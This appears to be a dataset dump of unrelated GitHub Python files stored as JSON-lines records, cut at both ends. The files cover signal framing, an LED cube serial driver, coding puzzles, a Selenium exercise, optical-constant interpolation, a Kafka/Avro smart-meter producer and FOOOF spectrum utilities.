train_data:\n # print(len(i))\n ######test_length########\n for i in test_data:\n test_length.append(get_mod(Size, cover, len(i)))\n Max = Size + (np.max(test_length)-1)*(Size-cover)\n for i in range(len(test_data)):\n test_data[i] = np.lib.pad(test_data[i],(0, np.max((0,Max-len(test_data[i])))), 
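get_mod and padding_zero above size the signal so that it splits into windows of Size samples overlapping by cover samples; a compact numpy equivalent of that framing, assuming the tail is zero-padded (a sketch):

import numpy as np

def frame_signal(x, size=300, cover=50):
    step = size - cover
    # Number of windows needed to cover x, then pad the tail with zeros.
    n_frames = max(1, int(np.ceil((len(x) - cover) / step)))
    padded = np.pad(x, (0, n_frames * step + cover - len(x)), mode="constant")
    return np.stack([padded[i * step:i * step + size] for i in range(n_frames)])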
'constant', constant_values=(0,0))\n # # ---Test---\n # for i in test_data:\n # print(len(i))\n new_test = []\n start = 0\n for index in range(len(test_data)):\n for i in range(np.max(test_length)):\n if i == 0:\n end = start + Size\n new_test.append(test_data[index][start:end])\n else:\n start = end - cover\n end = start + Size\n new_test.append(test_data[index][start:end])\n test = []\n for i in range(len(test_data)):\n test.append((test_data[i],test_label[i],test_length[i]))\n # #---Test----\n # for i in train:\n # last = Size + (i[2]-1)*(Size-cover)\n # print(i[0][-last-30:-last],': ',i[2])\n # print(len(train))\n return test\n\n\n#train = readTrain(train_path,Size=300,cover=0)\n#test = readTest(test_path,Size=300,cover=0)\n#for i in train:\n# print(i[0].shape,' ',i[1],' ',i[2])\n#print(len(train))","repo_name":"tensor-group/TT","sub_path":"read_utill.py","file_name":"read_utill.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19115778347","text":"from .config import DISPLAY_FILE\nimport os\n\ndef open_read(path):\n f = open(path, 'rb')\n while True:\n l = f.readline()\n if l == b'READY\\n':\n print(\"Starting...\")\n return f\n\nclass Display:\n \"\"\"This Display is used for smaller cubes and groups of LEDs.\n\n It uses a different format from the main server, but can be useful when testing small numbers of LEDs.\n\n It requires an arduino running arduino/led_controller.ino to be connected to /dev/ttyUSB0, at 115200 baud.\n \"\"\"\n def __init__(self, path = DISPLAY_FILE):\n self.path = path\n os.system('stty -F ' + path + ' cs8 115200 ignbrk -brkint -icrnl -imaxbel -opost -onlcr -isig -icanon -iexten -echo -echoe -echok -echoctl -echoke noflsh -ixon -crtscts')\n self.readfile = open_read(path)\n self.writefile = open(path, 'wb')\n\n def display(self, colours):\n data = bytearray(4 + 3 * len(colours))\n data[0] = ord('G')\n data[1] = ord('O')\n data[2] = ord(':')\n data[3] = len(colours) * 3\n for i in range(len(colours)):\n data[4+3*i] = colours[i].r\n data[4+3*i+1] = colours[i].g\n data[4+3*i+2] = colours[i].b\n self.writefile.write(data)\n self.writefile.flush()\n # Wait for the cube to finish sending the data to the LEDs.\n # It sends back the \"GO:\" we sent it when it is ready for more data.\n self.readfile.read(3)\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.writefile.close()\n self.readfile.close()\n\n","repo_name":"abryant/LED-Cube","sub_path":"display/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"18460252412","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef get_balloon_length():\n return int(sys.stdin.readline())\n\ndef read_array(balloon_length):\n return list(map(int, sys.stdin.readline().split(\" \"))) \n\ndef find_intersections(balloon_array):\n intersections = [0] * 1000001\n arrows_needed = 0\n for balloon in balloon_array:\n if intersections[balloon]:\n intersections[balloon] -= 1\n else:\n arrows_needed += 1\n intersections[balloon - 1] += 1\n return arrows_needed\n\ndef main():\n balloon_length = get_balloon_length()\n balloon_array = read_array(balloon_length)\n print(find_intersections(balloon_array))\n\nif __name__ == \"__main__\":\n 
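find_intersections above is the classic greedy for this problem: an arrow that pops a balloon at height h continues at h - 1, so each balloon is either absorbed by a waiting arrow or costs a new one. A traced example (hypothetical input, not from the source):

# [2, 1, 5, 5, 4]: arrow 1 pops 2, falls to 1 and pops it; the two 5s each
# need their own arrow, and one of those falls to 4 and pops the last balloon.
assert find_intersections([2, 1, 5, 5, 4]) == 3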
main()","repo_name":"DrakeCullen/AdvPy-dpcullen","sub_path":"kattis/baloni/baloni.py","file_name":"baloni.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40155252891","text":"import math\nfrom selenium import webdriver\nimport time\n\n\ndef calc(x):\n return str(math.log(abs(12 * math.sin(int(x)))))\n\n\ntry:\n link = \"http://suninjuly.github.io/get_attribute.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n\n # нахождение картинки с кладом\n img_treasure = browser.find_element_by_id(\"treasure\")\n\n # получение значения х из значения тега valuex\n x = img_treasure.get_attribute(\"valuex\")\n\n # вычисление значения функции calc от х\n y = calc(x)\n\n # заполнение полученного значения функции в текстовое поле\n answer = browser.find_element_by_id(\"answer\")\n answer.send_keys(str(y))\n\n # нажатие на флажок (чекбокс) \"I'am the robot\"\n robot_checkbox = browser.find_element_by_id(\"robotCheckbox\")\n robot_checkbox.click()\n\n # выбор переключателя (radiobutton) \"Robots rule\"\n people_rule = browser.find_element_by_id(\"robotsRule\")\n people_rule.click()\n\n # нажатие на кнопку \"Submit\" (\"Подтвердить\")\n button_submit = browser.find_element_by_css_selector(\"[type='Submit']\")\n button_submit.click()\n\n\nfinally:\n # задержка 10 секунд\n time.sleep(10)\n # закрытие браузера\n browser.quit()\n","repo_name":"Lion-78/Selenium-Python-course","sub_path":"lesson2_1_step7.py","file_name":"lesson2_1_step7.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33894646576","text":"from psana import DataSource\nimport sys\n\nexp = sys.argv[1]\nrun = sys.argv[2]\ndetname = sys.argv[3]\n\nxtc_dir = \"/reg/d/psdm/xpp/xpptut15/scratch/mona/%s\"%(exp)\nds = DataSource('exp=%s:run=%s:dir=%s'%(exp, run, xtc_dir))\ndet = eval('ds._configs[0].software.%s'%(detname))\ndettype = det.dettype\ndetid = det.detid\nprint(dettype, detid)\n","repo_name":"monarin/psana-nersc","sub_path":"demo18/get_det.py","file_name":"get_det.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7086811361","text":"import csv,os,sys\nfrom CSV_Handler import CSV_Handler\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom scipy import optimize\nimport matplotlib.pyplot as plt\n\ndef test_e1(k,a):\n return a/k**2\n\n\"\"\"\n Calculations for conversion between different optical constants\n\"\"\"\n\ndef calculate_s2_interp(interp_fxn_obj):\n k = np.arange(100,10000,1)\n temp_interp_obj = {}\n for temp in interp_fxn_obj.keys():\n temp_interp_obj[temp] = {}\n for opt in interp_fxn_obj[temp].keys():\n if 's1' in opt:\n axis = opt[-1]\n s1 = interp_fxn_obj[temp]['s1'+axis](k)\n inv_tau = interp_fxn_obj[temp]['tau-1'+axis](k)\n s2 = k*s1/inv_tau\n temp_interp_obj[temp]['s2'+axis] = interp1d(k, s2,kind='cubic')\n for temp in temp_interp_obj.keys():\n for opt in temp_interp_obj[temp].keys():\n interp_fxn_obj[temp][opt] = temp_interp_obj[temp][opt]\n\ndef calculate_eps_interp_from_sig(interp_fxn_obj):\n k = np.arange(100,10000,1)\n for temp in interp_fxn_obj.keys():\n s1a = interp_fxn_obj[temp]['s1a'](k)\n s2a = interp_fxn_obj[temp]['s2a'](k)\n s1b = interp_fxn_obj[temp]['s1b'](k)\n s2b = interp_fxn_obj[temp]['s2b'](k)\n sa = s1a+1j*s2a\n sb = s1b+1j*s2b\n epsa = (59.9585)*(1j)*sa/k\n epsb = 
(59.9585)*(1j)*sb/k\n e1a = np.real(epsa)\n e2a = np.imag(epsa)\n e1b = np.real(epsb)\n e2b = np.imag(epsb)\n interp_fxn_obj[temp]['e1a'] = interp1d(k,e1a,kind='cubic')\n interp_fxn_obj[temp]['e2a'] = interp1d(k,e2a,kind='cubic')\n interp_fxn_obj[temp]['e1b'] = interp1d(k,e1b,kind='cubic')\n interp_fxn_obj[temp]['e2b'] = interp1d(k,e2a,kind='cubic')\n\ndef calculate_epsab_interp_from_eps(interp_fxn_obj):\n k = np.arange(100,10000,1)\n for temp in interp_fxn_obj.keys():\n e1a = interp_fxn_obj[temp]['e1a'](k)\n e2a = interp_fxn_obj[temp]['e2a'](k)\n e1b = interp_fxn_obj[temp]['e1b'](k)\n e2b = interp_fxn_obj[temp]['e2b'](k)\n e1ab = (e1a+e1b)/2\n e2ab = (e2a+e2b)/2\n interp_fxn_obj[temp]['e1ab'] = interp1d(k,e1ab,kind='cubic')\n interp_fxn_obj[temp]['e2ab'] = interp1d(k,e2ab,kind='cubic')\n\ndef calculate_eps_interp_from_n_k(ks,total_data_obj,interp_fxn_obj):\n for temp in interp_fxn_obj.keys():\n kn = total_data_obj[temp]['k_n']\n kk = total_data_obj[temp]['k_k']\n n = np.interp(ks,kn,interp_fxn_obj[temp]['n'](kn))\n k = np.interp(ks,kk,interp_fxn_obj[temp]['k'](kk))\n\n e1 = n**2-k**2\n e2 = 2*n*k\n\n interp_fxn_obj[temp]['e1'] = interp1d(ks,e1,kind='cubic')\n interp_fxn_obj[temp]['e2'] = interp1d(ks,e2,kind='cubic')\n\n\"\"\"\n Function for creating a datasheet for input temperatures & optical constants\n\"\"\"\n\ndef create_datasheet(fname,temp,k,opt_consts,interp_fxn_obj,ec_const=False):\n opt_const_values = []\n\n for opt in opt_consts:\n if ec_const:\n if opt=='e1c':\n opt_const_values.append(np.full(len(k),5))\n elif opt=='e2c':\n opt_const_values.append(np.full(len(k),0.1))\n else:\n opt_const_values.append(interp_fxn_obj[temp][opt](k))\n else:\n if opt!='e2':\n opt_const_values.append(interp_fxn_obj[temp][opt](k))\n else:\n cleaned_e2 = interp_fxn_obj[temp][opt](k)\n cleaned_e2[cleaned_e2<0] = 0\n opt_const_values.append(cleaned_e2)\n\n with open('./Collated_Data/'+fname, mode='w') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n i=0\n for i in range(len(k)):\n row = [k[i]]\n for opt_values in opt_const_values:\n row.append(opt_values[i])\n writer.writerow(row)\n i+=1\n\n\"\"\"\n Functions for interpolating and extrapolating optical constants\n\"\"\"\n\ndef interpolate(total_data,interp_fxn):\n for temp in total_data.keys():\n print(temp)\n interp_fxn[temp] = {}\n for opt in total_data[temp].keys():\n if 'k_' not in opt:\n print('\\tInterpolating '+opt)\n x = total_data[temp]['k_'+opt]\n y = total_data[temp][opt]\n interp_fxn[temp][opt] = interp1d(x,y, kind='cubic', fill_value=(y[0],y[-1]), bounds_error=False)\n\ndef extrapolate(ext_range, ext_k, ext_fxn, temps, opts, total_data_obj,p0=None):\n for temp in temps:\n for opt in opts:\n x_data,y_data = [],[]\n for i,k in enumerate(total_data_obj[temp]['k_'+opt]):\n if k>ext_range[0] and k first element of the array.\n# All the elements to the right of inflection point < first element of the array.\n'''\nAlgorithm\n\nFind the mid element of the array.\n\nIf mid element > first element of array this means that we need to look for the inflection point on the right of mid.\n\nIf mid element < first element of array this that we need to look for the inflection point on the left of mid.\n'''\n\nclass Solution(object):\n def findMin(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # If the list has just one element then return that element.\n if len(nums) == 1:\n return nums[0]\n\n # left pointer\n left = 0\n # right pointer\n right = len(nums) - 1\n\n # if the last element is greater than the first element 
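Nearly every routine in this module builds interp1d cubic interpolants over the k grid np.arange(100, 10000, 1); the minimal usage pattern, with illustrative data:

import numpy as np
from scipy.interpolate import interp1d

# Illustrative data: a cubic interpolant needs at least four sample points.
k_samples = np.linspace(100, 10000, 50)
f = interp1d(k_samples, np.log(k_samples), kind="cubic")
dense = f(np.arange(100, 10000, 1.0))  # evaluate on the dense grid used above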
then there is no rotation.\n # e.g. 1 < 2 < 3 < 4 < 5 < 7. Already sorted array.\n # Hence the smallest element is first element. A[0]\n if nums[right] > nums[0]:\n return nums[0]\n\n # Binary search way\n while right >= left:\n # Find the mid element\n mid = left + (right - left) / 2\n # if the mid element is greater than its next element then mid+1 element is the smallest\n # This point would be the point of change. From higher to lower value.\n if nums[mid] > nums[mid + 1]:\n return nums[mid + 1]\n # if the mid element is lesser than its previous element then mid element is the smallest\n if nums[mid - 1] > nums[mid]:\n return nums[mid]\n\n # if the mid elements value is greater than the 0th element this means\n # the least value is still somewhere to the right as we are still dealing with elements greater than nums[0]\n if nums[mid] > nums[0]:\n left = mid + 1\n # if nums[0] is greater than the mid value then this means the smallest value is somewhere to the left\n else:\n right = mid - 1\n\nnums = [3,4,5,1,2]\nprint(findMin(nums))\nnums = [4,5,6,7,0,1,2]\nprint(findMin(nums))\nnums = [11,13,15,17]\nprint(findMin(nums))","repo_name":"qscez2001/leetcode","sub_path":"153.Rotated_Sorted_array.py","file_name":"153.Rotated_Sorted_array.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18674392545","text":"\"\"\"\nPrac 5\n\"\"\"\n\n\ndef main():\n global fullname\n email_to_name = {}\n email = input(\"Email:\")\n while email != \"\":\n find_name(email)\n email_to_name[email] = fullname\n email = input(\"Email:\")\n for email, fullname in email_to_name.items():\n print(f\"{fullname} ({email})\")\n\n\ndef find_name(email):\n global fullname\n name = email.split(\"@\")[0]\n name = name.split(\".\")\n try:\n fullname = name[0] + \" \" + name[1]\n fullname = fullname.title()\n print(f\"Is your name: {fullname}?\")\n except IndexError:\n print(f\"Is your name: {name}?\")\n answer = input(\"Y/N: \").upper()\n if answer.startswith(\"N\"):\n fullname = input(\"Name:\")\n\n\nmain()\n","repo_name":"Blake0982/cp1404practicals","sub_path":"prac_05/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"835894175","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 13 16:32:59 2015\n\n@author: Jason\n\"\"\"\n\nimport paths\nimport numpy\nimport cPickle\nimport csv\n#%% Read Data\n\nids = numpy.loadtxt(paths.pathToFBANKTrain,dtype='str_',usecols=(0,))\nf = file(paths.pathToSaveFBANKTrain,'rb')\nfbank_feat = cPickle.load(f)\nf.close()\n\nf = file(paths.pathToSave48Labels,'rb')\nfbank_labels = cPickle.load(f)\nf.close()\n\nphonemes = numpy.loadtxt(paths.pathToChrMap,dtype='str_',usecols=(0,))\nphonId = numpy.loadtxt(paths.pathToChrMap,dtype='int',usecols=(1,))\n\n#%% Extract Utterance\n\nutt_id = 'faem0_si1392'\n\nph48_39 = numpy.loadtxt(paths.pathToMapPhones,dtype='str_',delimiter='\\t')\nph48_39_dict = dict(ph48_39)\nphi_48 = dict(zip(numpy.arange(0,48),ph48_39[:,0]))\nphonemes2id = dict(zip(phonemes,phonId))\n\nfeature_vector = numpy.zeros(shape=(69*48+48*48,))\n\nprocessed = False\npreviousNo = -1\nfor feature, label, frameId in zip(fbank_feat,fbank_labels, ids):\n if not frameId.startswith(utt_id):\n if processed:\n break\n continue\n processed = True\n phoneme = phi_48[label]\n phonemeNo = phonemes2id[phoneme]\n offset = phonemeNo * 69\n for index in range(69):\n 
feature_vector[offset+index] += feature[index]\n base = 69*48\n if previousNo >= 0:\n offset = previousNo * 48\n feature_vector[offset + base + phonemeNo] += 1\n previousNo = phonemeNo\n \nwith open('hw2a_prediction.csv','wb') as csvfile:\n csvw = csv.writer(csvfile,delimiter=',')\n csvw.writerow(['id','feature'])\n for row in range(feature_vector.shape[0]):\n csvw.writerow([('%s_%i') % (utt_id,row),feature_vector[row]])\n","repo_name":"SYChienIsGod/hw2","sub_path":"hw2a_single_feature_vector_generation.py","file_name":"hw2a_single_feature_vector_generation.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43517599714","text":"\"\"\"Config schema for a GitHub App instance details.\"\"\"\nimport environ\n\n\n# pylint: disable=relative-beyond-top-level\nfrom ..models.utils import SecretStr\n\n\ndef validate_is_not_none_if_app(\n self, # pylint: disable=unused-argument\n attr, value,\n):\n \"\"\"Forbid None value in a GitHub App context.\"\"\"\n # pylint: disable=relative-beyond-top-level\n from ...app.runtime.utils import detect_env_mode\n\n if value is None and detect_env_mode() == 'app':\n raise ValueError(\n f'GitHub App must provide a proper value for {attr!r}',\n )\n\n\n@environ.config # pylint: disable=too-few-public-methods\nclass GitHubAppIntegrationConfig:\n \"\"\"GitHub App auth related config.\"\"\"\n\n app_id = environ.var(\n None,\n name='GITHUB_APP_IDENTIFIER',\n validator=validate_is_not_none_if_app,\n )\n private_key = environ.var(\n None,\n name='GITHUB_PRIVATE_KEY',\n converter=SecretStr,\n validator=validate_is_not_none_if_app,\n )\n webhook_secret = environ.var(\n None, name='GITHUB_WEBHOOK_SECRET',\n converter=lambda s: SecretStr(s) if s is not None else s,\n )\n\n app_name = environ.var(None, name='OCTOMACHINERY_APP_NAME')\n app_version = environ.var(None, name='OCTOMACHINERY_APP_VERSION')\n app_url = environ.var(None, name='OCTOMACHINERY_APP_URL')\n\n @property\n def user_agent(self): # noqa: D401\n \"\"\"The User-Agent value to use when hitting GitHub API.\"\"\"\n return f'{self.app_name}/{self.app_version} (+{self.app_url})'\n","repo_name":"olef1r/thisIsBot","sub_path":"venv/lib/python3.7/site-packages/octomachinery/github/config/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22880290840","text":"from confluent_kafka import Producer\nimport socket\nimport time\nimport json\nimport csv\nimport os\nimport glob\nimport configparser\nimport sys\nimport random\nimport avro.schema\nimport avro.io\nimport io\nfrom typing import Tuple, List, Iterator\n\n\ndef load_config(filepath: str) -> Tuple[str, str, str, str, int]:\n \"\"\"\n Load config file.\n\n @param filepath: path to config.ini\n\n @return datapath: path to data folder\n\n @return schemapath: path to schema file\n\n @return brokers: kafka broker addresses\n\n @return topic: kafka topic to write to\n\n @return playbackspeed: how many times faster to playback data\n \"\"\"\n config = configparser.ConfigParser()\n config.read(filepath)\n\n datapath = config['Data']['greend_path']\n schemapath = config['Data']['schema']\n brokers = config['KafkaBrokers']['address']\n topic = config['KafkaBrokers']['topic_rawdata']\n # how many time faster playback\n playbackspeed = int(config['Data']['playback_speed'])\n return datapath, schemapath, brokers, topic, playbackspeed\n\n\ndef 
house_reader_GREEND(path: str) -> Tuple[List[str], List[str], List[str]]:\n \"\"\"\n Load the GREEND file names into lists.\n\n @param path: the path to the data folder\n\n @return house_list: list of house names\n\n @return filenames: file name list for each house\n\n @return labels: list of appliance names for each house\n \"\"\"\n house_list = sorted(os.listdir(path))\n house_list = [house for house in house_list if \"building\" in house]\n filenames = [[] for _ in range(len(house_list))]\n for hid, house in enumerate(house_list):\n hpath = path + '/' + house\n filenames[hid]=sorted([os.path.basename(x) for x in glob.glob(hpath+\"/dataset_201*.csv\")])\n\n labels = {}\n with open(path + '/labels.json') as json_file:\n labels = json.load(json_file)\n return house_list, filenames, labels\n\n\ndef open_files(house_name: str, filename: str):\n \"\"\"\n Open the file for next day\n\n @rtype fd: file descriptor\n @return fd: next file descriptor\n\n @rtype csviter: iterator\n @return csviter: csv iterator\n \"\"\"\n\n fd = open(datapath + '/' + house_name + '/' + filename, newline='')\n csviter = csv.reader(fd, delimiter=',')\n # skip header\n next(csviter, None)\n return fd, csviter\n\n\ndef fileoffset_init(filenames: List[List[str]], filestart_offset:str) -> List[Iterator[str]]:\n \"\"\"\n For simulating multiple households\n Shift the starting file in the filename iterator given the file offset.\n \"\"\"\n filename_iters = [iter(house) for house in filenames]\n for _ in range(int(filestart_offset)):\n for hid, fiter in enumerate(filename_iters):\n filename = next(fiter, None)\n if not filename:\n filename_iters[hid] = iter(filenames[hid])\n return filename_iters\n\n\ndef avro_encoder(schema, value: dict):\n \"\"\"\n Encode dictionary to avro format with designated schema\n \"\"\"\n writer = avro.io.DatumWriter(schema)\n bytes_writer = io.BytesIO()\n encoder = avro.io.BinaryEncoder(bytes_writer)\n writer.write(value, encoder)\n raw_bytes = bytes_writer.getvalue()\n return raw_bytes\n\n\ndef kafka_init(servers: str, topic: str):\n \"\"\"\n Set up kafka server\n\n @param servers: all the bootstrap servers with ports, seperated with comma\n\n @param topic: the name of the kafka topic\n\n @rtype: object\n @return: kafka producer\n \"\"\"\n conf = {'bootstrap.servers': servers, 'client.id': socket.gethostname(), 'linger.ms': 50, 'batch.num.messages': 5000}\n producer = Producer(conf)\n return producer\n\n\ndef acked(err, msg):\n \"\"\"\n For kafka message acknowledgement\n \"\"\"\n if err is not None:\n print(\"Failed to deliver message: %s: %s\" % (str(msg), str(err)))\n\n\ndef is_number(s: str) -> bool:\n '''\n Check if string is a number\n '''\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n\nif __name__ == \"__main__\":\n _, config, filestart_offset, batch_num = sys.argv\n datapath, schemapath, brokers, topic, playbackspeed = load_config(config)\n schema = avro.schema.Parse(open(schemapath).read())\n house_list, filenames, labels = house_reader_GREEND(datapath)\n filename_iters = fileoffset_init(filenames, filestart_offset)\n producer = kafka_init(brokers, topic)\n\n starttime = time.time()\n\n # introduce randomness to the power output\n factor = random.uniform(0.8, 1.2)\n\n # fileds: file descriptors for each house\n # offsets: offset for the current time to the timestamp in the files\n # firsttimes: first timestamp for the current file\n # pretimes: previous timestamp for each house\n # prevalues: previous power values for each house\n # csviters: csv iterator for 
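avro_encoder above only serializes; the matching decode path uses DatumReader with a BinaryDecoder. A round-trip sketch against a toy schema (the field names here are illustrative, not the project's actual schema file):

import io
import avro.schema
import avro.io

toy_schema = avro.schema.Parse(
    '{"type": "record", "name": "Reading", "fields": ['
    '{"name": "timestamp", "type": "long"}, {"name": "power", "type": "double"}]}'
)
raw = avro_encoder(toy_schema, {"timestamp": 0, "power": 1.5})
decoder = avro.io.BinaryDecoder(io.BytesIO(raw))
decoded = avro.io.DatumReader(toy_schema).read(decoder)
assert decoded == {"timestamp": 0, "power": 1.5}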
row reading\n fileds = [None]*len(house_list)\n pretimes = [None]*len(house_list)\n firsttimes = [None]*len(house_list)\n offsets = [None]*len(house_list)\n csviters = [None]*len(house_list)\n prevalues = [[] for _ in range(len(house_list))]\n\n while True:\n for house_id, house_name in enumerate(house_list):\n # timestamp in millisecond\n current_timestamp = int(round(time.time() * 1000))\n # open a new file if reach eof\n if not pretimes[house_id]:\n # close opened file\n if fileds[house_id]:\n fileds[house_id].close()\n filename = next(filename_iters[house_id], None)\n # check if the end of the folder files, return to first file\n if not filename:\n filename_iters[house_id] = iter(filenames[house_id])\n filename = next(filename_iters[house_id])\n fileds[house_id], csviters[house_id] = open_files(house_name, filename)\n entries = next(csviters[house_id], None)\n firsttimes[house_id] = pretimes[house_id] = float(entries[0])*1000\n prevalues[house_id] = [float(x) if is_number(x) else 0 for x in entries[1:]]\n offsets[house_id] = current_timestamp - float(entries[0])*1000\n # check if the current passes the time inteval of the message\n elif (pretimes[house_id] - firsttimes[house_id]) / playbackspeed + offsets[house_id] + firsttimes[house_id] < current_timestamp:\n for idx, power in enumerate(prevalues[house_id]):\n house_serial = '2_' + batch_num + '_' + str(house_id)\n # take care of extra columns\n label = 'unknown' if idx >= len(labels[house_name]) else labels[house_name][idx]\n value = {\"timestamp\": current_timestamp, \"house_id\": house_serial, \"appliance_id\": house_serial + '_' + str(idx), \"appliance_name\": label, \"power\": power * factor}\n #print(value)\n # key: same house in the same kafka partition\n producer.produce(topic, key=house_serial, value=avro_encoder(schema, value), callback=acked)\n entries = next(csviters[house_id], None)\n if entries:\n # deal with ocassionally appearing column headers\n if entries[0] == 'timestamp':\n entries = next(csviters[house_id])\n pretimes[house_id] = float(entries[0])*1000\n prevalues[house_id] = [float(x) if is_number(x) else 0 for x in entries[1:]]\n else:\n pretimes[house_id] = None\n # asychronous producer\n producer.poll(0)\n","repo_name":"linkevinlin1/Insight_DE_smart_grid","sub_path":"ingestion/producer_GREEND_avro.py","file_name":"producer_GREEND_avro.py","file_ext":"py","file_size_in_byte":7547,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"37417987055","text":"import numpy as np\nfrom numpy.typing import ArrayLike\nfrom fooof import FOOOF\nfrom fooof.sim.gen import gen_aperiodic\nfrom scipy import signal\nfrom typing import List, Tuple\nfrom matplotlib import pyplot as plt\n\n\ndef get_stim_timestamps(sync_ch: np.ndarray, expected_pulses: int) -> np.ndarray:\n \"\"\"\n Get indexes of only threshold crossing up from 0 to 1.\n Sometimes there are spurious signals on the stimulation channel, when the stimulator turns off.\n This function trims to the expected number of pulses.\n :param sync_ch: the stimulation sync channel data\n :param expected_pulses: number of expected pulses\n :return: trimmed indexes\n \"\"\"\n threshold_crossing = np.diff(sync_ch > 0, prepend=False)\n idxs_edges = np.where(threshold_crossing)[0]\n stim_starts = idxs_edges[::2]\n stim_starts_trimmed = stim_starts[:expected_pulses]\n\n return stim_starts_trimmed\n\n\ndef get_median_distance(a: ArrayLike) -> float:\n \"\"\"\n Gets median distance between points\n :param a: array-like data\n 
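get_stim_timestamps above detects pulse onsets by differencing the thresholded sync channel: with prepend=False every level change becomes True, and the even-indexed changes are the rising edges. A worked example on a hypothetical signal:

import numpy as np

sync = np.array([0, 0, 2, 2, 0, 3, 0])
edges = np.where(np.diff(sync > 0, prepend=False))[0]  # all level changes
rising = edges[::2]  # every other change, starting from a 0 -> 1 crossing
# rising == array([2, 5])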
:return: median\n \"\"\"\n distances = []\n for i in range(len(a) - 1):\n distances.append(a[i] - a[i + 1])\n return abs(np.median(distances))\n\n\ndef running_mean(x: ArrayLike, n: int) -> ArrayLike:\n \"\"\"\n Returns the running mean with window n\n :param x: data\n :param n: window size\n :return: smoothed data\n \"\"\"\n cumsum = np.cumsum(np.insert(x, 0, 0))\n return (cumsum[n:] - cumsum[:-n]) / float(n)\n\n\ndef trim_equal_len(raw: List[ArrayLike]) -> List[float]:\n \"\"\"\n Trims a list of arrays to all have the same length.\n :param raw: raw data\n :return: list with trimmed data\n \"\"\"\n lens = [len(r) for r in raw]\n equaled = [r[:min(lens)] for r in raw]\n return equaled\n\n\ndef parse_raw(raw: np.ndarray, stimulation_idxs: np.ndarray, time_before_stim: int,\n skip_one: bool = False) -> np.ndarray:\n \"\"\"\n Parses the signal given the timestamp of the stimulation.\n :param raw: rawdata of one channel\n :param stimulation_idxs: indexes of the stimulation onset\n :param time_before_stim: how much before the stimulation onset to parse\n :param skip_one: if True parses every second stimulation\n :return: parsed raw signal into an array of equally sized chunks\n \"\"\"\n stimulation_idxs = stimulation_idxs + time_before_stim\n if skip_one:\n stimulation_idxs = stimulation_idxs[::2]\n # skip first chunk that precedes the first stimulation to avoid cropping errors\n split_raw = np.split(raw, stimulation_idxs)[1:]\n leveled_list = trim_equal_len(split_raw)\n trimmed_array = np.vstack(leveled_list)\n return trimmed_array\n\n\ndef get_average_amplitudes(parsed_raw, tested_amplitudes, pulses_number):\n \"\"\"\n Assumes an experiment where a sequence of stimulation amplitudes are applied,\n every stimulation with a fixed number of pulses\n\n :param parsed_raw:\n :param tested_amplitudes:\n :param pulses_number:\n :return:\n \"\"\"\n number_tested_amplitudes = len(tested_amplitudes)\n averaged_amplitudes = []\n for i in range(number_tested_amplitudes):\n start = i * pulses_number\n stop = (i + 1) * pulses_number\n averaged_amp = average_subset(parsed_raw, start, stop)\n averaged_amplitudes.append(averaged_amp)\n return averaged_amplitudes\n\n\ndef average_subset(array: ArrayLike, start: int, stop: int) -> np.ndarray:\n \"\"\"\n Averages a subset of elements\n :param array: input array\n :param start: start idx for parsing\n :param stop: stop idx for parsing\n :return: average of the subset\n \"\"\"\n parsed = array[start:stop]\n averaged = np.mean(parsed, axis=0)\n return averaged\n\n\ndef get_fooofed_psd(freqs: ArrayLike, psd: ArrayLike, frange: List[int] = None) -> (ArrayLike, ArrayLike):\n \"\"\"\n Computes the difference from the power spectrum and the aperiodic ie the periodic component\n :param freqs: frequencies corresponding to the y axis\n :param psd: power points corresponding to the x axis\n :param frange: range of frequencies where to compute the PSD\n :return: new set of frequencies, periodic component\n \"\"\"\n fm = FOOOF()\n fm.fit(freqs=freqs, power_spectrum=psd, freq_range=frange)\n aperiodic_component = gen_aperiodic(fm.freqs, fm._robust_ap_fit(fm.freqs, fm.power_spectrum))\n periodic_component = fm.power_spectrum - aperiodic_component\n return fm.freqs, periodic_component\n\n\ndef get_aperiodic(freqs: ArrayLike, psd: ArrayLike, frange: List[int] = None) -> (ArrayLike, ArrayLike):\n \"\"\"\n Computes aperiodic component of the psd\n :param freqs:\n :param psd:\n :param frange:\n :return:\n \"\"\"\n fm = FOOOF()\n fm.fit(freqs=freqs, power_spectrum=psd, 
